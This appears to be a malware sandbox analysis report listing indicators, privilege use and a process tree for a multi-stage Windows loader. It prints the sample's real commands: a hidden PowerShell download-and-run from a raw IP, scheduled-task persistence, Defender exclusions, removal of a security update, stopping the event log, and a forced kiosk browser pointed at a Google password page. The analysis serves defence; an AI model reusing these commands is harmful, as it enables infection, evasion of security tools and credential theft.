2060	d0e63d47c9.exe
2936	d45941d81b.exe
1388	35d7e2eba2.exe
2936	d45941d81b.exe
2936	d45941d81b.exe
2936	d45941d81b.exe
2936	d45941d81b.exe
1388	35d7e2eba2.exe
1388	35d7e2eba2.exe
1388	35d7e2eba2.exe
1388	35d7e2eba2.exe
2340	b799061492.exe
2148	baf41f08af.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2280	ceea5a1e0e.exe
2280	ceea5a1e0e.exe
2280	ceea5a1e0e.exe
1708	v6Oqdnc.exe
1708	v6Oqdnc.exe
3440	OEHBOHk.exe
3824	powershell.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3440	OEHBOHk.exe
3244	ckonftponqgz.exe
3216	powershell.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe
3244	ckonftponqgz.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	1388	4b99eca92e.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	2176	firefox.exe
Token: SeDebugPrivilege	2176	firefox.exe
Token: SeDebugPrivilege	2280	ceea5a1e0e.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeShutdownPrivilege	3928	powercfg.exe
Token: SeShutdownPrivilege	3936	powercfg.exe
Token: SeShutdownPrivilege	3944	powercfg.exe
Token: SeShutdownPrivilege	3972	powercfg.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeShutdownPrivilege	2576	powercfg.exe
Token: SeShutdownPrivilege	1948	powercfg.exe
Token: SeShutdownPrivilege	3056	powercfg.exe
Token: SeShutdownPrivilege	980	powercfg.exe
Token: SeLockMemoryPrivilege	3236	explorer.exe

Suspicious use of FindShellTrayWindow 20 IoCs

pid	Process
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2176	firefox.exe
2176	firefox.exe
2176	firefox.exe
2176	firefox.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe
2176	firefox.exe
2176	firefox.exe
2176	firefox.exe
2636	f4dcb32859.exe
2636	f4dcb32859.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 3032	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	30
PID 2868 wrote to memory of 3032	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	30
PID 2868 wrote to memory of 3032	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	30
PID 2868 wrote to memory of 3032	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	30
PID 2868 wrote to memory of 2788	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	31
PID 2868 wrote to memory of 2788	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	31
PID 2868 wrote to memory of 2788	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	31
PID 2868 wrote to memory of 2788	2868	6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe	31
PID 3032 wrote to memory of 2852	3032	cmd.exe	33
PID 3032 wrote to memory of 2852	3032	cmd.exe	33
PID 3032 wrote to memory of 2852	3032	cmd.exe	33
PID 3032 wrote to memory of 2852	3032	cmd.exe	33
PID 2788 wrote to memory of 2068	2788	mshta.exe	34
PID 2788 wrote to memory of 2068	2788	mshta.exe	34
PID 2788 wrote to memory of 2068	2788	mshta.exe	34
PID 2788 wrote to memory of 2068	2788	mshta.exe	34
PID 2068 wrote to memory of 2112	2068	powershell.exe	36
PID 2068 wrote to memory of 2112	2068	powershell.exe	36
PID 2068 wrote to memory of 2112	2068	powershell.exe	36
PID 2068 wrote to memory of 2112	2068	powershell.exe	36
PID 2112 wrote to memory of 700	2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE	37
PID 2112 wrote to memory of 700	2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE	37
PID 2112 wrote to memory of 700	2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE	37
PID 2112 wrote to memory of 700	2112	TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE	37
PID 700 wrote to memory of 368	700	rapes.exe	39
PID 700 wrote to memory of 368	700	rapes.exe	39
PID 700 wrote to memory of 368	700	rapes.exe	39
PID 700 wrote to memory of 368	700	rapes.exe	39
PID 700 wrote to memory of 1388	700	rapes.exe	40
PID 700 wrote to memory of 1388	700	rapes.exe	40
PID 700 wrote to memory of 1388	700	rapes.exe	40
PID 700 wrote to memory of 1388	700	rapes.exe	40
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 112	1388	4b99eca92e.exe	41
PID 1388 wrote to memory of 2084	1388	4b99eca92e.exe	42
PID 1388 wrote to memory of 2084	1388	4b99eca92e.exe	42
PID 1388 wrote to memory of 2084	1388	4b99eca92e.exe	42
PID 1388 wrote to memory of 2084	1388	4b99eca92e.exe	42
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 368 wrote to memory of 884	368	0974c9d1cc.exe	43
PID 112 wrote to memory of 1720	112	4b99eca92e.exe	45
PID 112 wrote to memory of 1720	112	4b99eca92e.exe	45
PID 112 wrote to memory of 1720	112	4b99eca92e.exe	45
PID 112 wrote to memory of 1720	112	4b99eca92e.exe	45
PID 700 wrote to memory of 2060	700	rapes.exe	47
PID 700 wrote to memory of 2060	700	rapes.exe	47
PID 700 wrote to memory of 2060	700	rapes.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
"C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn IYgybmaalE2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn IYgybmaalE2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2852
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Users\Admin\AppData\Local\TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE
      "C:\Users\Admin\AppData\Local\TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:700
      - C:\Users\Admin\AppData\Local\Temp\10105540101\0974c9d1cc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105540101\0974c9d1cc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:368
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:884
      - C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 1032
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:1720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 512
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2084
      - C:\Users\Admin\AppData\Local\Temp\10105560101\d0e63d47c9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105560101\d0e63d47c9.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2060
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\10105570101\d45941d81b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105570101\d45941d81b.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
      - C:\Users\Admin\AppData\Local\Temp\10105580101\35d7e2eba2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105580101\35d7e2eba2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:1388
      - C:\Users\Admin\AppData\Local\Temp\10105590101\b799061492.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105590101\b799061492.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 1212
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2380
      - C:\Users\Admin\AppData\Local\Temp\10105600101\baf41f08af.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105600101\baf41f08af.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2148
      - C:\Users\Admin\AppData\Local\Temp\10105610101\f4dcb32859.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105610101\f4dcb32859.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2636
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2740
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1604
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:928
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2176
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.870440171\239906035" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f98590d1-6dea-4f14-a697-4041d5dc1d0a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1280 101cd058 gpu
        9⤵
        
        PID:2900
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.925290655\318065056" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9a65428-1452-4676-b63c-727e24f9f17e} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1500 d74558 socket
        9⤵
        
        PID:2724
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.1590502267\47093695" -childID 1 -isForBrowser -prefsHandle 2028 -prefMapHandle 2044 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e915ac31-0d3e-4e79-adf4-12ae24178af1} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2020 19adbb58 tab
        9⤵
        
        PID:2516
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.562601285\341159552" -childID 2 -isForBrowser -prefsHandle 2852 -prefMapHandle 2848 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e09cbff6-9550-4c8c-a997-4cb7443f92c8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2864 d64858 tab
        9⤵
        
        PID:900
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.894274098\986878300" -childID 3 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d5a9802-14b8-4153-977f-e42b175c6c44} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3928 1fdd7458 tab
        9⤵
        
        PID:1940
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.63519901\736010315" -childID 4 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a29fe7-e9c1-4ff1-a11f-11673fb2169a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3892 200d7358 tab
        9⤵
        
        PID:112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1291563817\2097252303" -childID 5 -isForBrowser -prefsHandle 4240 -prefMapHandle 4244 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdc9c455-1321-4e34-83b5-619b0482cfd5} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4332 20231858 tab
        9⤵
        
        PID:568
      - C:\Users\Admin\AppData\Local\Temp\10105620101\ceea5a1e0e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105620101\ceea5a1e0e.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
      - C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1708
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1216
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:3920
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        Drops file in Windows directory
        
        PID:4064
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3928
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3972
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "DWENDQPG"
        7⤵
        Launches sc.exe
        
        PID:3980
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:4044
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:4084
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "DWENDQPG"
        7⤵
        Launches sc.exe
        
        PID:4092
      - C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 1036
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:3788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 520
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:3668

C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3244
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2272
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:3312
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2660
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

